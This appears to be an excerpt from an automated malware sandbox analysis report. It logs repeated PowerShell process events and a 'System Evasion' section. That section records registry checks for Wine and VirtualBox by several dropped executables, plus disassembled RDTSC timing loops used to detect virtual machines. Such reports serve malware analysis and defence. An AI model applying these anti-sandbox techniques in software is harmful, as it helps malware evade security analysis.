Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\1000026002\cee706a53f.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\1000026002\cee706a53f.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\1000026002\cee706a53f.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\1000026002\cee706a53f.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69F2E1 second address: 69EB9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D1BA3h], edi 0x00000011 jns 00007F8A2CE89C9Ch 0x00000017 push dword ptr [ebp+122D1689h] 0x0000001d pushad 0x0000001e pushad 0x0000001f xor di, F5C3h 0x00000024 popad 0x00000025 jmp 00007F8A2CE89C9Eh 0x0000002a popad 0x0000002b call dword ptr [ebp+122D2E49h] 0x00000031 pushad 0x00000032 mov dword ptr [ebp+122D199Fh], eax 0x00000038 xor eax, eax 0x0000003a jmp 00007F8A2CE89C9Bh 0x0000003f mov edx, dword ptr [esp+28h] 0x00000043 jno 00007F8A2CE89CA4h 0x00000049 mov dword ptr [ebp+122D3A97h], eax 0x0000004f jmp 00007F8A2CE89CA4h 0x00000054 mov esi, 0000003Ch 0x00000059 stc 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e jmp 00007F8A2CE89CA3h 0x00000063 lodsw 0x00000065 add dword ptr [ebp+122D199Fh], edi 0x0000006b mov dword ptr [ebp+122D199Fh], edi 0x00000071 add eax, dword ptr [esp+24h] 0x00000075 sub dword ptr [ebp+122D199Fh], eax 0x0000007b jmp 00007F8A2CE89C9Ch 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 jg 00007F8A2CE89CAEh 0x0000008a jmp 00007F8A2CE89CA8h 0x0000008f push eax 0x00000090 push eax 0x00000091 push edx 0x00000092 push ecx 0x00000093 js 00007F8A2CE89C96h 0x00000099 pop ecx 0x0000009a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 823493 second address: 8234AD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8A2D3CFEE2h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8234AD second address: 8234C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F8A2CE89C96h 0x0000000a jmp 00007F8A2CE89C9Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8234C1 second address: 8234CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8234CA second address: 823506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8A2CE89C96h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8A2CE89CA9h 0x00000014 jmp 00007F8A2CE89CA4h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 823506 second address: 823554 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8A2D3CFEE3h 0x00000008 jmp 00007F8A2D3CFEE7h 0x0000000d jmp 00007F8A2D3CFEE4h 0x00000012 je 00007F8A2D3CFED6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 80FD79 second address: 80FD9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jp 00007F8A2CE89C96h 0x0000000f pop eax 0x00000010 jmp 00007F8A2CE89CA1h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 822B26 second address: 822B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 822B2A second address: 822B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824849 second address: 69EB9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F8A2D3CFEDEh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov esi, ecx 0x00000019 push dword ptr [ebp+122D1689h] 0x0000001f movsx ecx, si 0x00000022 call dword ptr [ebp+122D2E49h] 0x00000028 pushad 0x00000029 mov dword ptr [ebp+122D199Fh], eax 0x0000002f xor eax, eax 0x00000031 jmp 00007F8A2D3CFEDBh 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jno 00007F8A2D3CFEE4h 0x00000040 mov dword ptr [ebp+122D3A97h], eax 0x00000046 jmp 00007F8A2D3CFEE4h 0x0000004b mov esi, 0000003Ch 0x00000050 stc 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 jmp 00007F8A2D3CFEE3h 0x0000005a lodsw 0x0000005c add dword ptr [ebp+122D199Fh], edi 0x00000062 mov dword ptr [ebp+122D199Fh], edi 0x00000068 add eax, dword ptr [esp+24h] 0x0000006c sub dword ptr [ebp+122D199Fh], eax 0x00000072 jmp 00007F8A2D3CFEDCh 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b jg 00007F8A2D3CFEEEh 0x00000081 jmp 00007F8A2D3CFEE8h 0x00000086 push eax 0x00000087 push eax 0x00000088 push edx 0x00000089 push ecx 0x0000008a js 00007F8A2D3CFED6h 0x00000090 pop ecx 0x00000091 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8248AB second address: 8248B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8248B0 second address: 8248B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8248B6 second address: 82493C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jno 00007F8A2CE89CA4h 0x00000010 jmp 00007F8A2CE89CA4h 0x00000015 popad 0x00000016 nop 0x00000017 movzx edi, di 0x0000001a push 00000000h 0x0000001c sub edi, dword ptr [ebp+122D3883h] 0x00000022 call 00007F8A2CE89C99h 0x00000027 jmp 00007F8A2CE89CA3h 0x0000002c push eax 0x0000002d push eax 0x0000002e push ecx 0x0000002f pushad 0x00000030 popad 0x00000031 pop ecx 0x00000032 pop eax 0x00000033 mov eax, dword ptr [esp+04h] 0x00000037 push esi 0x00000038 jmp 00007F8A2CE89CA8h 0x0000003d pop esi 0x0000003e mov eax, dword ptr [eax] 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 82493C second address: 82494D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824A50 second address: 824ABD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8A2CE89C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e or dword ptr [ebp+122D1F98h], edi 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 mov edx, dword ptr [ebp+122D3A0Fh] 0x0000001d pop edx 0x0000001e call 00007F8A2CE89C99h 0x00000023 jmp 00007F8A2CE89CA9h 0x00000028 push eax 0x00000029 push edx 0x0000002a push edi 0x0000002b jmp 00007F8A2CE89CA3h 0x00000030 pop edi 0x00000031 pop edx 0x00000032 mov eax, dword ptr [esp+04h] 0x00000036 push esi 0x00000037 jc 00007F8A2CE89C98h 0x0000003d push edx 0x0000003e pop edx 0x0000003f pop esi 0x00000040 mov eax, dword ptr [eax] 0x00000042 push eax 0x00000043 push edx 0x00000044 push ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824ABD second address: 824AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824AC2 second address: 824ADC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8A2CE89C98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jng 00007F8A2CE89CA8h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824ADC second address: 824AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824AE0 second address: 824AE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824AE4 second address: 824B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 mov dword ptr [ebp+122D1F42h], esi 0x0000000e push ebx 0x0000000f mov dword ptr [ebp+122D1B08h], ebx 0x00000015 pop edx 0x00000016 popad 0x00000017 pushad 0x00000018 xor ebx, 0FC731FEh 0x0000001e mov si, D058h 0x00000022 popad 0x00000023 push 00000003h 0x00000025 mov dword ptr [ebp+122D1BD8h], ebx 0x0000002b push 00000000h 0x0000002d cld 0x0000002e push 00000003h 0x00000030 mov dword ptr [ebp+122D185Bh], edi 0x00000036 mov ecx, ebx 0x00000038 push 6E10E811h 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F8A2D3CFEE7h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824B3A second address: 824B3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824B3F second address: 824B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824B45 second address: 824B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 51EF17EFh 0x0000000e mov ecx, dword ptr [ebp+122D2857h] 0x00000014 lea ebx, dword ptr [ebp+1245973Fh] 0x0000001a sbb ecx, 01096DCBh 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 push edi 0x00000023 pushad 0x00000024 popad 0x00000025 pop edi 0x00000026 push eax 0x00000027 push edx 0x00000028 jg 00007F8A2CE89C96h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824B73 second address: 824B92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F8A2D3CFEE3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824C9F second address: 824CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824CA3 second address: 824CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824CA9 second address: 824CF2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 598B1615h 0x0000000f and edi, dword ptr [ebp+122D388Bh] 0x00000015 lea ebx, dword ptr [ebp+1245974Ah] 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F8A2CE89C98h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 push eax 0x00000036 js 00007F8A2CE89CA4h 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 824CF2 second address: 824CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 814CA2 second address: 814CB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8A2CE89C96h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 814CB0 second address: 814CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 814CB5 second address: 814CC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F8A2CE89C9Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 844B37 second address: 844B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 845461 second address: 845494 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F8A2CE89C96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 jmp 00007F8A2CE89C9Eh 0x00000017 jmp 00007F8A2CE89C9Dh 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 845494 second address: 845498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 845498 second address: 84549E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84549E second address: 8454B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8A2D3CFEDBh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8454B3 second address: 8454BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8A2CE89C96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8454BD second address: 8454D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8A2D3CFEE0h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 845775 second address: 845781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 845781 second address: 845785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 845785 second address: 84578D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 845BA1 second address: 845BC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2D3CFEE9h 0x00000009 jnl 00007F8A2D3CFED6h 0x0000000f rdtsc
